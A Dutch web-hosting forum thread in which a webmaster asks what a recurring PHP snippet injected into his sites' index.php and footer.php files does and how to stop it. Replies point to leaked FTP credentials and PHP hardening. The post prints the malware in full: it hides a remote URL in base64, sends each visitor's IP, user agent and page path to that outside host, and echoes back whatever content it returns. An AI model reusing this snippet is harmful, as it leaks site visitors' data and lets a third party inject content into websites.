Het afgelopen jaar raken continue diverse domeinen binnen mijn webserver besmet met een Curl code. Ik heb géén idee wat het doet, maar het plakt zichzelf automatisch in bestanden met triviale namen zoals index.php, home.php, footer.php, et cetera, die ik vervolgens allemaal handmatig langs ga om die code te verwijderen. Ik zit op DirectAdmin. De code ziet er als volgt uit:
Iemand anders bekend met dit probleem? Hoe ontwijk ik deze code en wat doet het precies?
PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
| <?php if (!isset($sRetry)) { global $sRetry; $sRetry = 1; // This code use for global bot statistic $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot $stCurlHandle = NULL; $stCurlLink = ""; if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes { if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics $stCurlLink = base64_decode( 'aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']); @$stCurlHandle = curl_init( $stCurlLink ); } } if ( $stCurlHandle !== NULL ) { curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1); curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12); $sResult = @curl_exec($stCurlHandle); if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; // Statistic code end } curl_close($stCurlHandle); } } ?> |
Iemand anders bekend met dit probleem? Hoe ontwijk ik deze code en wat doet het precies?
:strip_icc():strip_exif()/u/43400/avatar.jpeg?f=community){kind=avatar}
Zorgen dat je geen FTP client gebruikt die wachtwoorden in plain text opslaat? Wat heb je zelf al geprobeerd/gezocht/gevonden?:strip_exif()/u/53522/crop583d477015a24.gif?f=community)
/u/387025/l.png?f=community)
/u/61403/crop58bff192a74cb_cropped.png?f=community)
:strip_exif()/u/62716/avatar.gif?f=community){kind=avatar}
Er zitten nogal wat opties in die zelfs hercompilen van PHP vereisen. Dit maakt je omgeving wel een stuk robuuster maar je zal er wel wat tijd in moeten steken (alle stappen worden wel stap voor stap uitegelegd).
